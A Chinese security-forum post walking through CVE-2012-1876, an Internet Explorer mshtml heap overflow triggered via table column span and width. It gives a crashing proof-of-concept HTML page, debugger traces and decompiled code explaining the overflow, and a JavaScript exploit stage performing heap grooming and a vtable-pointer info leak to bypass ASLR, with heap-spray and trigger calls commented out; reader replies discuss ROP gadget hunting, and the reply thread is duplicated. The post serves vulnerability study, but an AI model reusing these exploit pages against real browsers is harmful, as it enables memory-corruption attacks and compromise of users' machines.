[原创]cve-2012-1876漏洞详解-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]cve-2012-1876漏洞详解

发表于: 2016-11-25 22:28 12192

[原创]cve-2012-1876漏洞详解

hualuore

2016-11-25 22:28

12192

关于调试其他文章有，就不重点介绍了，主要介绍一下漏洞原理，汇编代码，以及漏洞的利用过程。
poc.html:

<html>
<body>
<table style="table-layout:fixed" >
<col id="132" width="41" span="1" > </col>
</table>
<script>

function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 1000;
}

setTimeout("over_trigger();",1);

</script>
</body>
</html>

0:005> uf mshtml!ULongLongToUInt
mshtml!ULongLongToUInt:
6867d7e6 8bff mov edi,edi
6867d7e8 55 push ebp
6867d7e9 8bec mov ebp,esp
6867d7eb 837d0c00 cmp dword ptr [ebp+0Ch],0
6867d7ef 7712 ja mshtml!ULongLongToUInt+0x1b (6867d803)

mshtml!ULongLongToUInt+0xb:
6867d7f1 8b4d08 mov ecx,dword ptr [ebp+8]
6867d7f4 7205 jb mshtml!ULongLongToUInt+0x15 (6867d7fb)

mshtml!ULongLongToUInt+0x10:
6867d7f6 83f9ff cmp ecx,0FFFFFFFFh
6867d7f9 7708 ja mshtml!ULongLongToUInt+0x1b (6867d803)

mshtml!ULongLongToUInt+0x15:
6867d7fb 8908 mov dword ptr [eax],ecx
6867d7fd 33c0 xor eax,eax

mshtml!ULongLongToUInt+0x23:
6867d7ff 5d pop ebp
6867d800 c20800 ret 8

mshtml!ULongLongToUInt+0x1b:
6867d803 8308ff or dword ptr [eax],0FFFFFFFFh
6867d806 b816020780 mov eax,80070216h
6867d80b ebf2 jmp mshtml!ULongLongToUInt+0x23 (6867d7ff)

signed int __userpurge ULongLongToUInt@<eax>(int a1@<eax>, unsigned __int64 a2, unsigned int *a3)
{
signed int result; // eax@2

if ( a2 > 0xFFFFFFFF )
{
*(_DWORD *)a1 = -1;
result = -2147024362;
}
else
{
*(_DWORD *)a1 = a2;
result = 0;
}
return result;
}

686934b7 8b45fc mov eax,dword ptr [ebp-4] ；eax=4
686934ba f76508 mul eax,dword ptr [ebp+8] ;eax=eax* [ebp+8]=4*0x1c
686934bd 52 push edx ; 0
686934be 50 push eax ; 4*0x1c
686934bf 8d45f8 lea eax,[ebp-8]
686934c2 e81fa3feff call mshtml!ULongLongToUInt (6867d7e6) ;[ebp-8] =4*0x1c
686934c7 8bd8 mov ebx,eax; =0
686934c9 85db test ebx,ebx
686934cb 7525 jne mshtml!CImplAry::EnsureSizeWorker+0xb1 (686934f2)

0:005> uf mshtml!CImplAry::EnsureSizeWorker
mshtml!CImplAry::EnsureSizeWorker:
6869349e 8bff mov edi,edi
686934a0 55 push ebp
686934a1 8bec mov ebp,esp
686934a3 51 push ecx
686934a4 51 push ecx
686934a5 53 push ebx
686934a6 56 push esi
686934a7 8bf0 mov esi,eax
686934a9 6a04 push 4
686934ab 58 pop eax ；eax=4
686934ac 8945fc mov dword ptr [ebp-4],eax ; ==4
686934af 3bf0 cmp esi,eax ;esi=函数外边eax=edx=函数CalculateMinMax [ebp+8]=[ebx+0x54]=spannum，此处判断spannum与4的大小，如果spannum大于等于4，则跳转。。。。
686934b1 0f833c300000 jae mshtml!CImplAry::EnsureSizeWorker+0x15 (686964f3)

mshtml!CImplAry::EnsureSizeWorker+0x3a:
686934b7 8b45fc mov eax,dword ptr [ebp-4]
686934ba f76508 mul eax,dword ptr [ebp+8]
686934bd 52 push edx
686934be 50 push eax
686934bf 8d45f8 lea eax,[ebp-8]
686934c2 e81fa3feff call mshtml!ULongLongToUInt (6867d7e6) ;[ebp-8] =4*0x1c
686934c7 8bd8 mov ebx,eax
686934c9 85db test ebx,ebx ;ebx=0
686934cb 7525 jne mshtml!CImplAry::EnsureSizeWorker+0xb1 (686934f2)

mshtml!CImplAry::EnsureSizeWorker+0x50:
686934cd f6470402 test byte ptr [edi+4],2
686934d1 0f8529aa0300 jne mshtml!CImplAry::EnsureSizeWorker+0x56 (686cdf00)

mshtml!CImplAry::EnsureSizeWorker+0x96:
686934d7 ff75f8 push dword ptr [ebp-8] ;4*0x1c
686934da 8d770c lea esi,[edi+0Ch]
686934dd e8c3a2feff call mshtml!_HeapRealloc (6867d7a5) ;堆分配内存的首地址是esi=edi+0Ch=ebx+0x90+0x0c=ctablelayout+0x90+0x0c 后续会将此地址标记为vulheap。

686934e2 8bd8 mov ebx,eax
686934e4 85db test ebx,ebx
686934e6 750a jne mshtml!CImplAry::EnsureSizeWorker+0xb1 (686934f2)

以下代码不重要了，略去。。。

mshtml!CImplAry::EnsureSizeWorker呢，沿着函数mshtml!CImplAry::EnsureSizeWorker往上看一下：
mshtml!CTableLayout::CalculateMinMax:
685ca078 8bff mov edi,edi
685ca07a 55 push ebp
685ca07b 8bec mov ebp,esp
685ca07d 81ec98000000 sub esp,98h
685ca083 53 push ebx
685ca084 8b5d08 mov ebx,dword ptr [ebp+8]
685ca087 56 push esi
685ca088 8b750c mov esi,dword ptr [ebp+0Ch]
685ca08b 8b4628 mov eax,dword ptr [esi+28h]
685ca08e 898570ffffff mov dword ptr [ebp-90h],eax
685ca094 8b4354 mov eax,dword ptr [ebx+54h]
685ca097 894508 mov dword ptr [ebp+8],eax
685ca09a 8b8328010000 mov eax,dword ptr [ebx+128h]
685ca0a0 c1e802 shr eax,2
685ca0a3 8945b8 mov dword ptr [ebp-48h],eax

。。。。。。。。。。
省略部分不重要代码
。。。。。。。。。。
mshtml!CTableLayout::CalculateMinMax+0x161:
685ca19e 8bc8 mov ecx,eax

mshtml!CTableLayout::CalculateMinMax+0x163:
685ca1a0 8b5508 mov edx,dword ptr [ebp+8]
685ca1a3 8bc2 mov eax,edx
685ca1a5 2bc1 sub eax,ecx
685ca1a7 8945e4 mov dword ptr [ebp-1Ch],eax
685ca1aa 6a00 push 0
685ca1ac 58 pop eax
685ca1ad 0f94c0 sete al
685ca1b0 894b50 mov dword ptr [ebx+50h],ecx
685ca1b3 c1e008 shl eax,8
685ca1b6 334344 xor eax,dword ptr [ebx+44h]
685ca1b9 2500010000 and eax,100h
685ca1be 314344 xor dword ptr [ebx+44h],eax
685ca1c1 f6462c01 test byte ptr [esi+2Ch],1
685ca1c5 0f8559501900 jne mshtml!CTableLayout::CalculateMinMax+0x18a (6875f224)

mshtml!CTableLayout::CalculateMinMax+0x193:
685ca1cb 33c0 xor eax,eax

mshtml!CTableLayout::CalculateMinMax+0x195:
685ca1cd 0945c8 or dword ptr [ebp-38h],eax
685ca1d0 397d10 cmp dword ptr [ebp+10h],edi
685ca1d3 0f855b501900 jne mshtml!CTableLayout::CalculateMinMax+0x19d (6875f234)

mshtml!CTableLayout::CalculateMinMax+0x1da:
685ca1d9 8b8394000000 mov eax,dword ptr [ebx+94h]
685ca1df c1e802 shr eax,2 ;等于除以四
685ca1e2 3bc2 cmp eax,edx
685ca1e4 7d39 jge mshtml!CTableLayout::CalculateMinMax+0x223 (685ca21f)

mshtml!CTableLayout::CalculateMinMax+0x1e7:
685ca1e6 3bd7 cmp edx,edi
685ca1e8 8db390000000 lea esi,[ebx+90h]
685ca1ee 0f8c8632f0ff jl mshtml!CTableLayout::CalculateMinMax+0x203 (684cd47a)

mshtml!CTableLayout::CalculateMinMax+0x1f1:
685ca1f4 3b5608 cmp edx,dword ptr [esi+8]
685ca1f7 7613 jbe mshtml!CTableLayout::CalculateMinMax+0x210 (685ca20c)

mshtml!CTableLayout::CalculateMinMax+0x1f6:
685ca1f9 6a1c push 1Ch
685ca1fb 8bc2 mov eax,edx
685ca1fd 8bfe mov edi,esi
685ca1ff e89a920c00 call mshtml!CImplAry::EnsureSizeWorker (6869349e)

mshtml!CTableLayout::CalculateMinMax+0x208:
685ca204 85c0 test eax,eax
685ca206 0f85ac020000 jne mshtml!CTableLayout::CalculateMinMax+0xdf1 (685ca4b8)

0:015> bl
0 e 67aca078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax
0:015> .childdbg 1
Processes created by the current process will be debugged
0:015> g
ModLoad: 6b160000 6b212000 C:\Windows\System32\jscript.dll
Breakpoint 0 hit
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca078 esp=023fbfd8 ebp=023fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
67aca078 8bff mov edi,edi
0:005> p
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca07a esp=023fbfd8 ebp=023fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x2:
67aca07a 55 push ebp
0:005>
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca07b esp=023fbfd4 ebp=023fc1f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x3:
67aca07b 8bec mov ebp,esp
0:005>
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca07d esp=023fbfd4 ebp=023fbfd4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x5:
67aca07d 81ec98000000 sub esp,98h
0:005>
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca083 esp=023fbf3c ebp=023fbfd4 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
mshtml!CTableLayout::CalculateMinMax+0xb:
67aca083 53 push ebx
0:005>
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca084 esp=023fbf38 ebp=023fbfd4 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
mshtml!CTableLayout::CalculateMinMax+0xc:
67aca084 8b5d08 mov ebx,dword ptr [ebp+8] ss:0023:023fbfdc=0036c028
0:005>
eax=ffffffff ebx=0036c028 ecx=00412802 edx=ffffffff esi=00000000 edi=023fc234
eip=67aca087 esp=023fbf38 ebp=023fbfd4 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
mshtml!CTableLayout::CalculateMinMax+0xf:
67aca087 56 push esi
0:005> dd ebx+0x94 l1
0036c0bc 00000000
0:005> dd ebx+0x54 l1
0036c07c 00000001

0:005> dd ebx+0x94 l1
0036c0bc 00000004
0:005> dd ebx+0x54 l1
0036c07c 00000001

0:005> !heap -p -a poi(ebx+0x9c)
address 0037ae10 found in
_HEAP @ 2b0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0037ae08 000f 0000 [00] 0037ae10 00070 - (busy)

0:005> dd 0037ae08 l50
0037ae08 3c5b016a 08004449 00001004 00001004
0037ae18 00001004 00000000 33006c00 2e003200
0037ae28 00010048 2c006c00 32002d00 37003100
0037ae38 39003600 16000000 00000000 00000000
0037ae48 07000007 00004441 0030a940 00309e58
0037ae58 00000000 00000000 00000000 00000000
0037ae68 00000000 00000000 00000000 00000000
0037ae78 00000000 00000000 2d5b017b 0c004460
0037ae88 76db7bd0 76db7c64 00000000 00000003
0037ae98 00330f08 0037ae88 00349ef0 023fd2c8
0037aea8 00000003 00000000 000000f0 00000000
0037aeb8 00000000 0082eaec 00000000 00000000
0037aec8 00000000 00000000 003655f0 ffffffff
0037aed8 00000000 00000000 00000000 000001f4

0:005> bl
0 e 6a40a078 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax
1 e 6a59f31a 0001 (0001) 0:**** mshtml!CTableLayout::CalculateMinMax+0x3a7
0:005> g
Breakpoint 1 hit
eax=006f4890 ebx=00716728 ecx=00000032 edx=00000000 esi=0072189c edi=006f4890
eip=6a59f31a esp=025abd40 ebp=025abde4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x3a7:
6a59f31a e8acb3deff call mshtml!CTableCol::GetAAspan (6a38a6cb)
0:005> p
eax=000003e8 ebx=00716728 ecx=00000002 edx=006fdca0 esi=0072189c edi=006f4890
eip=6a59f31f esp=025abd40 ebp=025abde4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x3ac:
6a59f31f 3de8030000 cmp eax,3E8h

6a59f30b e87dd0f5ff call mshtml!CElement::IsDisplayNone (6a4fc38d)
6a59f310 85c0 test eax,eax
6a59f312 0f854238dcff jne mshtml!CTableLayout::CalculateMinMax+0x3dc (6a362b5a)
6a59f318 8bc7 mov eax,edi
6a59f31a e8acb3deff call mshtml!CTableCol::GetAAspan (6a38a6cb)
6a59f31f 3de8030000 cmp eax,3E8h
6a59f324 894510 mov dword ptr [ebp+10h],eax ；；
6a59f327 7c07 jl mshtml!CTableLayout::CalculateMinMax+0x3bd (6a59f330)
6a59f329 c74510e8030000 mov dword ptr [ebp+10h],3E8h
将1000放入[ebp+10h]中。

0:005> g
Breakpoint 2 hit
eax=006dc8c0 ebx=00716728 ecx=0074cd68 edx=006fdca0 esi=025ac078 edi=00000001
eip=6a59f39f esp=025abd38 ebp=025abde4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x47d:
6a59f39f e8a854dbff call mshtml!CWidthUnitValue::GetPixelWidth (6a35484c)
0:005> dd esp l4
025abd38 025ac078 00000000 025ac044 00000000
0:005> dd 025ac044 l1
025ac044 00000000
0:005> p
eax=00414114 ebx=00716728 ecx=0074cd68 edx=00004141 esi=025ac078 edi=00000001
eip=6a59f3a4 esp=025abd40 ebp=025abde4 iopl=0 ov up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a06
mshtml!CTableLayout::CalculateMinMax+0x482:
6a59f3a4 837da000 cmp dword ptr [ebp-60h],0 ss:0023:025abd84=00000000
0:005> dd esp l1
025abd40 025ac044

6a59f396 8b45a8 mov eax,dword ptr [ebp-58h]
6a59f399 8b4dcc mov ecx,dword ptr [ebp-34h]
6a59f39c 6a00 push 0
6a59f39e 56 push esi
6a59f39f e8a854dbff call mshtml!CWidthUnitValue::GetPixelWidth (6a35484c)
6a59f3a4 837da000 cmp dword ptr [ebp-60h],0 ss:0023:025abd84=00000000
6a59f3a8 8945d0 mov dword ptr [ebp-30h],eax ;结果存入[ebp-30h]中
6a59f3ab 744f je mshtml!CTableLayout::CalculateMinMax+0x4da (6a59f3fc)
6a59f3ad 8b459c mov eax,dword ptr [ebp-64h]
6a59f3b0 85c0 test eax,eax

mshtml!CTableLayout::CalculateMinMax+0x505:
6a59f427 8b4df8 mov ecx,dword ptr [ebp-8] ；ecx=0
6a59f42a 8b4510 mov eax,dword ptr [ebp+10h]; eax=0n1000
6a59f42d 6bc91c imul ecx,ecx,1Ch ecx=0
6a59f430 0145c8 add dword ptr [ebp-38h],eax ;0x3e8
6a59f433 894ddc mov dword ptr [ebp-24h],ecx ;0
6a59f436 eb03 jmp mshtml!CTableLayout::CalculateMinMax+0x519 (6a59f43b)

//循环开始
mshtml!CTableLayout::CalculateMinMax+0x516:
6a59f438 8b4ddc mov ecx,dword ptr [ebp-24h]

mshtml!CTableLayout::CalculateMinMax+0x519:
6a59f43b 8b839c000000 mov eax,dword ptr [ebx+9Ch] ;vulheap地址
6a59f441 03c1 add eax,ecx ；eax=vulheap地址
6a59f443 837de400 cmp dword ptr [ebp-1Ch],0 ；poi(ebp-0x1c)==0
6a59f447 8945d8 mov dword ptr [ebp-28h],eax ；poi(ebp-28h)是函数AdjustForCol 要复制到的地址，可以看到这个地址从vulheap开始，没复制一次，地址增加0x1c
6a59f44a 741a je mshtml!CTableLayout::CalculateMinMax+0x544 (6a59f466) ;跳转

mshtml!CTableLayout::CalculateMinMax+0x52a:
6a59f44c 8b4510 mov eax,dword ptr [ebp+10h]
6a59f44f 83f801 cmp eax,1
6a59f452 7e12 jle mshtml!CTableLayout::CalculateMinMax+0x544 (6a59f466)

mshtml!CTableLayout::CalculateMinMax+0x532:
6a59f454 48 dec eax
6a59f455 3945ec cmp dword ptr [ebp-14h],eax
6a59f458 750c jne mshtml!CTableLayout::CalculateMinMax+0x544 (6a59f466)

mshtml!CTableLayout::CalculateMinMax+0x538:
6a59f45a 0faf45f4 imul eax,dword ptr [ebp-0Ch]
6a59f45e 8b4dd0 mov ecx,dword ptr [ebp-30h]
6a59f461 2bc8 sub ecx,eax
6a59f463 894df4 mov dword ptr [ebp-0Ch],ecx

mshtml!CTableLayout::CalculateMinMax+0x544:
6a59f466 ff75c0 push dword ptr [ebp-40h]
6a59f469 8b45cc mov eax,dword ptr [ebp-34h]
6a59f46c ff750c push dword ptr [ebp+0Ch]
6a59f46f 8b75d8 mov esi,dword ptr [ebp-28h]
6a59f472 ff75f4 push dword ptr [ebp-0Ch] ；width*100
6a59f475 e8a0151900 call mshtml!CTableColCalc::AdjustForCol (6a730a1a) ；这个函数可以用IDA的F5功能
6a59f47a ff45ec inc dword ptr [ebp-14h]
6a59f47d 8b45ec mov eax,dword ptr [ebp-14h] ；第一次循环时eax=1 后续每次加1
6a59f480 8345dc1c add dword ptr [ebp-24h],1Ch ；第一次poi(ebp-0x24)==0,以后每次加0x1c
6a59f484 3b4510 cmp eax,dword ptr [ebp+10h] ;poi(ebp+10h)=0x3e8 也就是循环0x3e8次，每次复制的长度是0x1c,所以0x3e8*0x1c >4*0x1c,造成溢出
6a59f487 7caf jl mshtml!CTableLayout::CalculateMinMax+0x516 (6a59f438)

void __userpurge 0:005> dd poi(ebp-0x34) l1
004ebde8 04141149(CTableColCalc *this@<ecx>, int a2@<eax>, int a3@<esi>, const struct CWidthUnitValue *a4, int a5, struct CCalcInfo *a6, int a7)
{
int v7; // ST04_4@1

v7 = *(_DWORD *)a2 & 0xF;
*(_DWORD *)(a3 + 24) = *(_DWORD *)a2;
if ( CUnitValue::IsScalerUnit(v7) )
。。。。。

void __userpurge CTableColCalc::AdjustForCol(CTableColCalc *this@<ecx>, int a2@<eax>, int a3@<esi>, const struct CWidthUnitValue *a4, int a5, struct CCalcInfo *a6, int a7)
{
int v7; // ST04_4@1

v7 = *(_DWORD *)a2 & 0xF;
*(_DWORD *)(a3 + 24) = *(_DWORD *)a2; // poi(esi+0x18)=*eax=0x4141149
if ( CUnitValue::IsScalerUnit(v7) ) // 实现跳转
{
CUnitValue::SetValue((signed int)a4, a3 + 24, 8);// a4=0x414114 result=8|16*a4 ;poi(a3+24)=result 所以poi(esi+0x18)=8|16*0x00414114
*(_DWORD *)(a3 + 4) = a4; // poi(esi+4)=a4=0x00414114 即函数的第一个参数
*(_DWORD *)a3 = a4; // poi(esi)=a4=0x00414114，即函数的第一个参数
}
else
{
if ( a6 != (struct CCalcInfo *)1 )
CUnitValue::SetPercent((CUnitValue *)0x64, a3 + 24);
*(_DWORD *)a3 = 1;
*(_DWORD *)(a3 + 4) = *(_DWORD *)(a5 + 16);
}
*(_DWORD *)(a3 + 8) = a4; //poi(esi+8)=a4=0x00414114，即函数的第一个参数
}

<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr = free.substring(0, (0x100-6)/2);
al = string1.substring(0, (0x100-6)/2);
bl = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr = null;
CollectGarbage();
}
function leak(){
//alert(1);
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+(2+8)/2,(0x100-6)/2+(2+8+4)/2));
//alert(str_addr.toString(16));
//alert(typeof(str_addr));
//alert(str_addr.toString(16));
str_addr=(str_addr & 0xffff0000)-0x00150000;
alert(typeof(str_addr));
alert(str_addr.toString(16));
//alert(str_addr);
//str_addr = str_addr - 1410704;
//setTimeout(function(){heapspray(str_addr)}, 200);
}

function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1178993";
evil_col.span = "32"; //zhishaoshi 0x1d=29
}

setTimeout(function(){leak()}, 300);
setTimeout(function(){get_leak()},700);
//setTimeout(function(){heapspray()}, 900);
//setTimeout(function(){trigger_overflow()}, 1200);

</script>
</body>
</html>

var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;

for (var i=0; i < 500; i+=2) {
fr = free.substring(0, (0x100-6)/2);
al = string1.substring(0, (0x100-6)/2);
bl = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・4

免费・8

支持

最新回复 (6)
sakura零雪币： 699 活跃值： (444) 能力值： ( LV9，RANK：240 ) 在线值：发帖 12 回帖 72 粉丝 23 关注私信	sakura零 4 2 楼想问一下，这个虚表指针与mshtml基址的偏移能够怎么得到，为什么知道它就是这个数？ 2018-3-11 15:38 0
BDomne 雪币： 4230 活跃值： (1435) 能力值： (RANK：270 ) 在线值：发帖 53 回帖 157 粉丝 88 关注私信	BDomne 5 3 楼 sakura零想问一下，这个虚表指针与mshtml基址的偏移能够怎么得到，为什么知道它就是这个数？参考这篇的分析：https://web.archive.org/web/20120713043025/www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php 其中有提到： In order to leak the base address of mshtml.dll under IE9, the idea is to read the vTable of an object: mshtml!CButtonLayout. This table is set at a fixed offset inside each version of the DLL, so knowing it leads to knowing the base address. 此漏洞为堆溢出，所给 Exp 通过构造对象布局可以读取到 mshtml!CButtonLayout::`vftable' 的值。 2018-3-11 19:10 0
sakura零雪币： 699 活跃值： (444) 能力值： ( LV9，RANK：240 ) 在线值：发帖 12 回帖 72 粉丝 23 关注私信	sakura零 4 4 楼 BDomne 参考这篇的分析：https://web.archive.org/web/20120713043025/www.vupen.com/blog/20120710.Advanced_Exploitation ... 谢谢！ 2018-3-14 11:14 0
sakura零雪币： 699 活跃值： (444) 能力值： ( LV9，RANK：240 ) 在线值：发帖 12 回帖 72 粉丝 23 关注私信	sakura零 4 5 楼哦哦，突然发现这篇我看了，我主要是把mshtml拖进IDA里，没法在IDA里找到CButtonLaylout的虚表，没法确定和基地址的偏移。（在左边函数搜索CButtonLayout，搜不到构造函数，不知道怎么找到虚表，不知道是不是我符号文件的问题。。） 2018-3-14 11:16 0
BDomne 雪币： 4230 活跃值： (1435) 能力值： (RANK：270 ) 在线值：发帖 53 回帖 157 粉丝 88 关注私信	BDomne 5 6 楼 sakura零哦哦，突然发现这篇我看了，我主要是把mshtml拖进IDA里，没法在IDA里找到CButtonLaylout的虚表，没法确定和基地址的偏移。（在左边函数搜索CButtonLayout，搜不到构造函 ... 没试过，不过动态调可得到 vftable 值和模块基址，也能算出偏移 2018-3-14 12:06 0
菜鸡雪雪币： 220 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	菜鸡雪 7 楼大哥找rop 用mona报错，有碰到过吗 ``` 2:033> !py mona rop -m mshtml.dll Hold on... [+] Command used: !py mona.py rop -m mshtml.dll ---------- Mona command started on 2022-10-27 22:17:13 (v2.0, rev 618) ---------- [+] Processing arguments and criteria - Pointer access level : X - Only querying modules mshtml.dll [+] Generating module info table, hang on... - Processing modules - Done. Let's rock 'n roll. [+] Preparing output file '_rop_progress_iexplore.exe_2592.log' - (Re)setting logfile _rop_progress_iexplore.exe_2592.log [+] Progress will be written to _rop_progress_iexplore.exe_2592.log [+] Maximum offset : 40 [+] (Minimum/optional maximum) stackpivot distance : 8 [+] Max nr of instructions : 6 [+] Split output into module rop files ? False [+] Going to create rop chains for all relevant/supported techniques: [+] Enumerating 22 endings in 1 module(s)... - Querying module mshtml.dll Traceback (most recent call last): File "mona.py", line 19195, in main commands[command].parseProc(opts) File "mona.py", line 12147, in procROP findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique) File "mona.py", line 6380, in findROPGADGETS found_opcodes = searchInModule(search,thismodule,criteria) File "mona.py", line 5334, in searchInModule return searchInRange(sequences, start, end, criteria) File "mona.py", line 5214, in searchInRange dbg.getMemoryPages() File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages size = int(info[3].replace('`', ''), base=16) ValueError: invalid literal for int() with base 16: 'MEM_IMAGE' ``` 2022-10-28 19:58 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

hualuore

发帖

回帖

150

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (6)
sakura零雪币： 699 活跃值： (444) 能力值： ( LV9，RANK：240 ) 在线值：发帖 12 回帖 72 粉丝 23 关注私信	sakura零 4 2 楼想问一下，这个虚表指针与mshtml基址的偏移能够怎么得到，为什么知道它就是这个数？ 2018-3-11 15:38 0
BDomne 雪币： 4230 活跃值： (1435) 能力值： (RANK：270 ) 在线值：发帖 53 回帖 157 粉丝 88 关注私信	BDomne 5 3 楼 sakura零想问一下，这个虚表指针与mshtml基址的偏移能够怎么得到，为什么知道它就是这个数？参考这篇的分析：https://web.archive.org/web/20120713043025/www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php 其中有提到： In order to leak the base address of mshtml.dll under IE9, the idea is to read the vTable of an object: mshtml!CButtonLayout. This table is set at a fixed offset inside each version of the DLL, so knowing it leads to knowing the base address. 此漏洞为堆溢出，所给 Exp 通过构造对象布局可以读取到 mshtml!CButtonLayout::`vftable' 的值。 2018-3-11 19:10 0
sakura零雪币： 699 活跃值： (444) 能力值： ( LV9，RANK：240 ) 在线值：发帖 12 回帖 72 粉丝 23 关注私信	sakura零 4 4 楼 BDomne 参考这篇的分析：https://web.archive.org/web/20120713043025/www.vupen.com/blog/20120710.Advanced_Exploitation ... 谢谢！ 2018-3-14 11:14 0
sakura零雪币： 699 活跃值： (444) 能力值： ( LV9，RANK：240 ) 在线值：发帖 12 回帖 72 粉丝 23 关注私信	sakura零 4 5 楼哦哦，突然发现这篇我看了，我主要是把mshtml拖进IDA里，没法在IDA里找到CButtonLaylout的虚表，没法确定和基地址的偏移。（在左边函数搜索CButtonLayout，搜不到构造函数，不知道怎么找到虚表，不知道是不是我符号文件的问题。。） 2018-3-14 11:16 0
BDomne 雪币： 4230 活跃值： (1435) 能力值： (RANK：270 ) 在线值：发帖 53 回帖 157 粉丝 88 关注私信	BDomne 5 6 楼 sakura零哦哦，突然发现这篇我看了，我主要是把mshtml拖进IDA里，没法在IDA里找到CButtonLaylout的虚表，没法确定和基地址的偏移。（在左边函数搜索CButtonLayout，搜不到构造函 ... 没试过，不过动态调可得到 vftable 值和模块基址，也能算出偏移 2018-3-14 12:06 0
菜鸡雪雪币： 220 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	菜鸡雪 7 楼大哥找rop 用mona报错，有碰到过吗 ``` 2:033> !py mona rop -m mshtml.dll Hold on... [+] Command used: !py mona.py rop -m mshtml.dll ---------- Mona command started on 2022-10-27 22:17:13 (v2.0, rev 618) ---------- [+] Processing arguments and criteria - Pointer access level : X - Only querying modules mshtml.dll [+] Generating module info table, hang on... - Processing modules - Done. Let's rock 'n roll. [+] Preparing output file '_rop_progress_iexplore.exe_2592.log' - (Re)setting logfile _rop_progress_iexplore.exe_2592.log [+] Progress will be written to _rop_progress_iexplore.exe_2592.log [+] Maximum offset : 40 [+] (Minimum/optional maximum) stackpivot distance : 8 [+] Max nr of instructions : 6 [+] Split output into module rop files ? False [+] Going to create rop chains for all relevant/supported techniques: [+] Enumerating 22 endings in 1 module(s)... - Querying module mshtml.dll Traceback (most recent call last): File "mona.py", line 19195, in main commands[command].parseProc(opts) File "mona.py", line 12147, in procROP findROPGADGETS(modulecriteria,criteria,endings,maxoffset,depth,split,thedistance,fast,mode,sortedprint,technique) File "mona.py", line 6380, in findROPGADGETS found_opcodes = searchInModule(search,thismodule,criteria) File "mona.py", line 5334, in searchInModule return searchInRange(sequences, start, end, criteria) File "mona.py", line 5214, in searchInRange dbg.getMemoryPages() File "C:\Program Files\Debugging Tools for Windows (x86)\windbglib.py", line 1063, in getMemoryPages size = int(info[3].replace('`', ''), base=16) ValueError: invalid literal for int() with base 16: 'MEM_IMAGE' ``` 2022-10-28 19:58 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复